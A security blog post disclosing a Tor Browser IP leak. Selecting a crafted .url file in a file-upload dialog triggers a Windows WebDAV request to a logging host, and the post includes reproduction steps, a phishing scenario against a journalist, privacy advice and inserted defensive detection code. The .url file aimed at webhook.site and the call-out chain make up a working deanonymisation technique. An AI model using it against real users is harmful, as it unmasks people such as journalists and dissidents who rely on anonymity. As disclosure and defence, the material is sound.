Discover the real IP of a “Tor browser” user by exploiting a design flaw
Why did I publish this?
After disclosing this to the Tor project, I got the response that this issue had already been disclosed publicly three years ago and was never dealt with.
From what I have seen, this issue is not widely known on the web, and frankly I found no information on it until I received the response from the Tor project.
The old ticket: https://trac.torproject.org/projects/tor/ticket/18101
This issue is somewhat similar to “TorMoil” vulnerability from 2017.
I believe it is important to know about this technique in order to know better the possible risks and to raise awareness in general. Plus, I believe it is important to let vendors know that our privacy should be their highest concern and they need to fix such flaws.
Affected when used with the following browsers
Tor Browser, Brave with Tor mode, Chrome, Firefox, Internet Explorer.
For some reason the Edge browser is not affected.
When you see a button captioned “browse” on a web page for selecting a file to upload, it is an HTML object that looks like this:
When a user selects a “url” file in that HTML page, something simple yet interesting happens that reveals his or her true public IP address.
The privacy concern
When someone posts a comment on social media or visits the political opposition’s forum, his or her public IP address can be logged in the web site’s database.
One of the ways for a government entity to spy on citizens is to view the domain name resolution requests or encrypted traffic and see what the user is doing.
One option a user who wants to stay anonymous has is to use a browser that performs DNS resolution through the Tor network and routes all browsing through it. Because the connection to the Tor network is encrypted, the user stays anonymous while browsing and nobody can identify the user’s real public IP.
The user’s real public IP makes it possible to find the real person behind the browser, and a browser that uses Tor protects the user from exactly that. Such people may be journalists, citizens, terrorists, malware authors and more.
The flaw explained
In order to reproduce the flaw, I will be using a handy website called “webhook.site”, which generates a unique URI and records every HTTP request made to that page, including the client IP address and the request headers. The site author: https://twitter.com/fredsted
Next, we will create a simple URL file from the unique link that we got:
We will open the Tor Browser and check what our IP is as seen through the Tor Browser.
We will go to any web site that lets us choose a file for upload. For example: https://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_fileupload_create
Immediately after we choose our new file “CouponCode.url”, we will see a new request recorded on webhook.site:
What we can see now is our real public IP — 21.xxx.xxx.xx3 and not the Tor public IP which is 126.96.36.199.
So what just happened? (A bit technical)
Basically, when the browser performed a read of the URL file, a service triggered a Windows process to make a WebDAV request. WebDAV (“Web Distributed Authoring and Versioning”) is a legacy Windows file transfer protocol over HTTP that is still used today. More info on WebDAV: https://www.comparitech.com/net-admin/webdav/
When we look at the TCP connections using netstat while reproducing this test, we can see the svchost.exe process suddenly connecting to the same web site.
If we look at the processes using procmon.exe we can see the following events:
First we see this event:
user: NT AUTHORITY\LOCAL SERVICE
services.exe calls ==>
C:\WINDOWS\system32\svchost.exe -k LocalService -p -s WebClient
Process is created:
rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie webhook.site@SSL https://webhook.site/
Then we see this:
Let’s look at the following line and take it apart:
\\anywebsite = the host name of the file share, written in UNC form
@SSL = makes WebDAV use SSL/TLS on the default port 443
DavWWWRoot = forces the connection to be made using WebDAV
75c8376e-xxxx-xxxx-xxxx-xxxxxxxa613c = the URI
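To make the pattern above usable on the defensive side, here is an added example (my own code, not part of the original post or of any Tor/Microsoft tooling) that does two things: it scans process-creation log lines for the exact chain shown above (rundll32.exe loading davclnt.dll with DavSetCookie for a host that is not an internal WebDAV server), and it takes a \\host@SSL\DavWWWRoot\path UNC path apart into its components, following the meaning of @SSL and DavWWWRoot given in the post. The log line format ("user | parent -> command line"), the sample events, and the internal allow-list suffix are all constructed for the example; the assumption that a UNC path without @SSL means plain HTTP on port 80 is mine.

```python
"""Added example: detect WebClient/WebDAV call-outs in process logs and parse DavWWWRoot UNC paths."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample events in an assumed "user | parent -> command line" format.
# The second and fourth lines mirror the svchost/rundll32 chain seen in procmon.
SAMPLE_EVENTS = [
    r"NT AUTHORITY\LOCAL SERVICE | services.exe -> C:\WINDOWS\system32\svchost.exe -k LocalService -p -s WebClient",
    r"NT AUTHORITY\LOCAL SERVICE | svchost.exe -> rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie webhook.site@SSL https://webhook.site/",
    r"DESKTOP\alice | explorer.exe -> C:\Program Files\Tor Browser\Browser\firefox.exe",
    r"DESKTOP\alice | svchost.exe -> rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie fileserver.corp.example@SSL https://fileserver.corp.example/",
]

# Assumed allow-list: WebDAV shares the organisation actually uses. Anything else is an unexpected call-out.
TRUSTED_HOST_SUFFIXES: Tuple[str, ...] = (".corp.example",)

# Matches "rundll32[.exe] <path>davclnt.dll,DavSetCookie <host>[@SSL|@port]".
DAVSETCOOKIE_RE = re.compile(
    r"rundll32(?:\.exe)?\s+\S*davclnt\.dll,DavSetCookie\s+(?P<host>[^\s@\\]+)(?:@(?P<port>SSL|\d+))?",
    re.IGNORECASE,
)


@dataclass
class DavAlert:
    user: str
    host: str
    tls: bool
    line: str


def parse_event(line: str) -> Tuple[str, str]:
    """Split a constructed log line into (user, command line)."""
    user, rest = (p.strip() for p in line.split("|", 1))
    command = rest.split("->", 1)[1].strip()
    return user, command


def detect_webdav_callouts(lines: List[str], trusted_suffixes=TRUSTED_HOST_SUFFIXES) -> List[DavAlert]:
    """Return one alert per DavSetCookie launch whose target host is not on the allow-list."""
    alerts = []
    for line in lines:
        user, command = parse_event(line)
        m = DAVSETCOOKIE_RE.search(command)
        if not m:
            continue
        host = m.group("host").lower()
        if host.endswith(trusted_suffixes):
            continue  # expected internal WebDAV traffic
        tls = (m.group("port") or "").upper() == "SSL"
        alerts.append(DavAlert(user=user, host=host, tls=tls, line=line))
    return alerts


@dataclass
class DavPath:
    host: str
    tls: bool
    port: int
    forced_webdav: bool  # True when the DavWWWRoot marker is present
    path: str
    url: str


UNC_RE = re.compile(r"^\\\\(?P<host>[^\\@]+)(?:@(?P<port>SSL|\d+))?(?P<rest>(?:\\[^\\]*)*)$", re.IGNORECASE)


def parse_dav_unc(unc: str) -> DavPath:
    """Decompose \\host[@SSL|@port][\DavWWWRoot]\segments into host, port, TLS flag and the HTTP URL it maps to."""
    m = UNC_RE.match(unc)
    if not m:
        raise ValueError(f"not a UNC path: {unc!r}")
    host = m.group("host").lower()
    port_token: Optional[str] = m.group("port")
    tls = port_token is not None and port_token.upper() == "SSL"
    port = 443 if tls else (int(port_token) if port_token else 80)  # no @ marker assumed to mean plain HTTP
    segments = [s for s in m.group("rest").split("\\") if s]
    forced = bool(segments) and segments[0].lower() == "davwwwroot"
    if forced:
        segments = segments[1:]
    path = "/" + "/".join(segments)
    default_port = (tls and port == 443) or (not tls and port == 80)
    url = f"{'https' if tls else 'http'}://{host}{'' if default_port else ':' + str(port)}{path}"
    return DavPath(host=host, tls=tls, port=port, forced_webdav=forced, path=path, url=url)


if __name__ == "__main__":
    for alert in detect_webdav_callouts(SAMPLE_EVENTS):
        print(f"[ALERT] {alert.user} -> WebDAV call-out to {alert.host} (tls={alert.tls})")
    print(parse_dav_unc(r"\\webhook.site@SSL\DavWWWRoot\75c8376e-xxxx-xxxx-xxxx-xxxxxxxa613c"))
```

Run over the constructed events, the only alert is the call-out to webhook.site; the call-out to the allow-listed internal share is ignored, and the Tor Browser launch is never touched because it does not load davclnt.dll. Feeding real Sysmon or procmon exports into this would only require swapping `parse_event` for the matching field layout.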
So, why should I care? (Attack scenarios)
Suppose I work for the government and I know the email address of a journalist who is fighting for human rights in a very censored and dark dictatorship. I would like to find out the journalist’s true identity in order to execute him for treason and find the contacts who are leaking sensitive information. But, unfortunately, this journalist is using the Tor Browser or Brave with Tor and I am very frustrated.
I can send him a phishing email with a .url file that links to a new domain. In this email I will write something like: upload this coupon file to Google Cloud in order to get a free 1-year subscription. Or maybe something like: upload this coupon code to “GLEB Premium VPN” in order to bypass government censorship, the deal ends in the next 12 hours.
As soon as the journalist tries to upload this URL file — I will find the real public IP of the traitor!
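The scenario above turns on a .url file reaching the user and later being picked in a file dialog. The added example below (my own code, not part of the original post) is the kind of triage a mail gateway or endpoint agent can run on a .url attachment before that ever happens: it parses the INI-style [InternetShortcut] section, collects every field that names a location (URL, IconFile and WorkingDirectory, the keys I assume matter here) and flags the file when any of them points at a remote host. The sample shortcut text is constructed; its host and path are the ones the post already uses.

```python
"""Added example: flag Internet Shortcut (.url) files that point at remote hosts before a user can open them."""
import configparser
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample .url content (CRLF line endings, as Windows writes them).
SAMPLE_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=https://webhook.site/75c8376e-xxxx-xxxx-xxxx-xxxxxxxa613c\r\n"
    "IconIndex=0\r\n"
)

# Constructed shortcut that only refers to a local file: should pass.
LOCAL_URL_FILE = "[InternetShortcut]\nURL=file:///C:/docs/readme.txt\n"

# Fields that can name a location; which ones the shell dereferences is an assumption, so all are checked.
LOCATION_KEYS = ("url", "iconfile", "workingdirectory")


@dataclass
class UrlFileVerdict:
    remote_hosts: List[str] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.remote_hosts)


def extract_host(value: str) -> Optional[str]:
    """Return the remote host a field points at, or None if it is local or unparsable."""
    v = value.strip()
    if v.startswith("\\\\"):  # UNC form, e.g. \\host\share or \\host@SSL\DavWWWRoot\...
        host = v[2:].split("\\", 1)[0].split("@", 1)[0]
        return host.lower() or None
    parts = urlsplit(v)
    if parts.scheme.lower() in ("http", "https", "ftp", "file") and parts.hostname:
        return parts.hostname.lower()
    return None  # relative path, drive path, file:/// with no host, etc.


def triage_url_file(text: str, allowed_hosts: tuple = ()) -> UrlFileVerdict:
    """Parse a .url file and report every remote host it references that is not on the allow-list."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text.replace("\r\n", "\n"))
    verdict = UrlFileVerdict()
    section = next((s for s in cp.sections() if s.lower() == "internetshortcut"), None)
    if section is None:
        verdict.reasons.append("no [InternetShortcut] section")
        return verdict
    for key in LOCATION_KEYS:
        if not cp.has_option(section, key):
            continue
        host = extract_host(cp.get(section, key))
        if host is None or host in allowed_hosts:
            continue
        if host not in verdict.remote_hosts:
            verdict.remote_hosts.append(host)
        verdict.reasons.append(f"{key} points at remote host {host}")
    return verdict


if __name__ == "__main__":
    for name, content in (("CouponCode.url", SAMPLE_URL_FILE), ("local.url", LOCAL_URL_FILE)):
        v = triage_url_file(content)
        print(f"{name}: {'QUARANTINE' if v.suspicious else 'ok'} {v.reasons}")
```

Because the leak in the post happens when the file is merely selected, not opened, the useful control point is before delivery: quarantining any .url attachment whose location fields resolve to a host outside the organisation removes the lure before a file dialog ever sees it.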
What can be done?
Today there are many solutions that can help with anonymity, but they should be chosen with their own security risks in mind. Yes, “secure” solutions may be a risk themselves.
For example: your VPN provider may leak your info, your browser may have a bug and so on…
Some of the recommendations that I can give to boost your privacy:
- Use a full VPN together with tor browser or a SOCKS proxy.
- Use Tor proxy solutions like “oniongw” or “whonix gateway”. http://oniongw.ibsoft.com.gr/ or https://www.whonix.org/download/
- Use DNS over HTTPS for name resolution encryption on all services.
- Use a “privacy operating system” like Tails. https://tails.boum.org/
In any case — you should always check your settings. For example: set the Tor Browser security level to “safest” in order to block most scripts that can be leveraged against you, because in the default configuration you are not very safe.